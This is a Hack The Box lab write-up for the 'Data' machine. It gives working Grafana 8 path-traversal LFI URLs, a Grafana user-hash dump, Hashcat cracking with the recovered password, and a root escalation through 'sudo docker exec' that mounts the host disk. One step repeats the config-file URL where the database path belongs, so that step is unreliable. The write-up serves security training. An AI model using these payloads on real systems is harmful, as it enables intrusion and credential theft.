HTB-Data

,

HTB Data Machine Walkthrough - Complete Penetration Testing Guide

Introduction

Welcome to this comprehensive walkthrough of the Data machine from Hack The Box (HTB). In this detailed writeup, we’ll explore the complete penetration testing methodology used to compromise this Linux-based target. This HTB Data walkthrough demonstrates several critical vulnerabilities including Grafana Local File Inclusion (LFI), credential extraction, hash cracking with Hashcat, and Docker privilege escalation.

Throughout this HTB writeup, we’ll be using industry-standard tools including Nmap for reconnaissance, SQLite for database analysis, Hashcat for password cracking, and various Docker commands for privilege escalation. Whether you’re preparing for the OSCP, studying for cybersecurity certifications, or simply looking to improve your pentesting skills, this step-by-step guide will walk you through each phase of the exploitation process.

Let’s dive into this HTB Data machine walkthrough and break down the attack chain that leads to complete system compromise.

Initial Reconnaissance

Nmap Scan Results

We begin our enumeration with an Nmap scan that reveals two open ports:

1
2
22/tcp   open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 
3000/tcp open  ppp?    syn-ack ttl 62

Port 22 is running SSH, while port 3000 hosts an interesting service that warrants further investigation.

Grafana 8 Vulnerability Discovery

Identifying the Service

Upon accessing port 3000, we discover that it’s running Grafana version 8. This is a significant finding, as Grafana 8 has known vulnerabilities.

Local File Inclusion (LFI) Exploitation

Through research and referencing a bug bounty report (https://hackerone.com/reports/1427086), we identify a Local File Inclusion (LFI) vulnerability that allows us to read arbitrary files from the server.

We can exploit this vulnerability using the following path traversal technique to read /etc/passwd:

1
http://10.129.78.166:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Configuration File Analysis

Extracting Grafana Configuration

Next, we leverage the LFI vulnerability to access Grafana’s default configuration file:

1
http://10.129.78.166:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fshare%2Fgrafana%2Fconf%2Fdefaults.ini

Within the configuration file, we find database credentials:

1
2
3
4
5
6
7
8
9
10
# Either "mysql", "postgres" or "sqlite3", it's your choice
type = sqlite3
host = 127.0.0.1:3306
name = grafana
user = root
# If the password contains # or ; you have to wrap it with triple quotes. Ex """#password;"""
password =
# Use either URL or the previous fields to configure the database
# Example: mysql://user:secret@host:port/database
url =

Downloading the Database

We can also download the SQLite database file using the same LFI vulnerability:

1
http://10.129.78.166:3000/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Fshare%2Fgrafana%2Fconf%2Fdefaults.ini

Database Analysis and Credential Extraction

Opening the SQLite Database

With the database file downloaded, we can examine its contents using SQLite3:

1
sqlite3 grafana.db

Dumping User Credentials

We query the user table to extract stored credentials:

1
2
3
sqlite> SELECT * FROM user;
1|0|admin|admin@localhost||7a919e4bbe95cf5104edf354ee2e6234efac1ca1f81426844a24c4df6131322cf3723c92164b6172e9e73faf7a4c2072f8f8|YObSoLj55S|hLLY6QQ4Y6||1|1|0||2022-01-23 12:48:04|2022-01-23 12:48:50|0|2022-01-23 12:48:50|0
2|0|boris|boris@data.vl|boris|dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8|LCBhdtJWjl|mYl941ma8w||1|0|0||2022-01-23 12:49:11|2022-01-23 12:49:11|0|2012-01-23 12:49:11|0

We now have two users: admin and boris, along with their hashed passwords and salts.

Password Hash Cracking

Converting Hash Format

To make the hashes compatible with Hashcat, we need to convert them using grafana2hashcat (https://github.com/iamaldi/grafana2hashcat).

The hash format should include the salt:

1
dc6becccbb57d34daf4a4e391d2015d3350c60df3608e9e99b5291e47f3e5cd39d156be220745be3cbe49353e35f53b51da8,LCBhdtJWjl

We run the conversion tool:

1
python3 grafana2hashcat.py hash

The tool returns the hash in SHA-256 format, which is compatible with Hashcat.

Cracking with Hashcat

Now we can crack the hash using Hashcat with the rockyou.txt wordlist:

1
hashcat -m 10900 hash2 /usr/share/wordlists/rockyou.txt

Success! The password is cracked:

1
sha256:10000:TENCaGR0SldqbA==:3GvszLtX002vSk45HSAV0zUMYN82COnpm1KR5H8+XNOdFWviIHRb48vkk1PjX1O1Hag=:beautiful1

Boris’s password is: beautiful1

Initial Access via SSH

With valid credentials in hand, we can now establish an SSH connection to the target machine:

1
ssh boris@10.129.78.166

We now have user-level access to the system as boris.

Privilege Escalation

Sudo Privileges Enumeration

After gaining initial access, we check for sudo privileges:

1
2
3
4
5
sudo -l
Matching Defaults entries for boris on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User boris may run the following commands on localhost:
    (root) NOPASSWD: /snap/bin/docker exec *

Excellent! Boris can run docker exec as root without a password. This is a critical privilege escalation vector.

Identifying the Root Filesystem

We run the mount command to identify mounted filesystems:

1
/dev/sda1 on / type ext4 (rw,relatime)

The root filesystem is mounted on /dev/sda1, which will be important for our privilege escalation.

Finding the Docker Container

We need to identify the running Docker container:

1
ps auxww | grep docker

This command reveals the container ID that we’ll use in the next step.

Gaining Root Shell in Docker

Now we execute a bash shell inside the Docker container as root:

1
sudo docker exec -it --user root e6ff5b1cbc85cdb2157879161e42a08c1062da655f5a6b7e24488342339d4b81 bash

Mounting the Host Filesystem

Once inside the container as root, we mount the host’s root filesystem:

1
mount /dev/sda1 /mnt/

This mounts the entire host filesystem to /mnt/ within the container, giving us access to all files on the main machine.

Capturing the Root Flag

Finally, we can read the root flag:

1
cat /mnt/root/root.txt

Conclusion

This HTB Data walkthrough demonstrated a complete penetration testing methodology from initial reconnaissance to root access. The attack chain involved:

  1. Reconnaissance - Nmap scanning to identify open services
  2. Vulnerability Discovery - Identifying Grafana 8 LFI vulnerability
  3. Information Gathering - Extracting configuration files and database
  4. Credential Extraction - Dumping user hashes from SQLite database
  5. Password Cracking - Using Hashcat to crack password hashes
  6. Initial Access - SSH login with cracked credentials
  7. Privilege Escalation - Exploiting Docker sudo permissions to gain root

This machine highlights the importance of proper access controls, keeping software up-to-date, and the dangers of misconfigured Docker permissions. The combination of an LFI vulnerability, weak password storage, and overly permissive sudo rules created a clear path to complete system compromise.

I hope this HTB writeup helped you understand the exploitation process. Happy hacking, and remember to always practice ethically!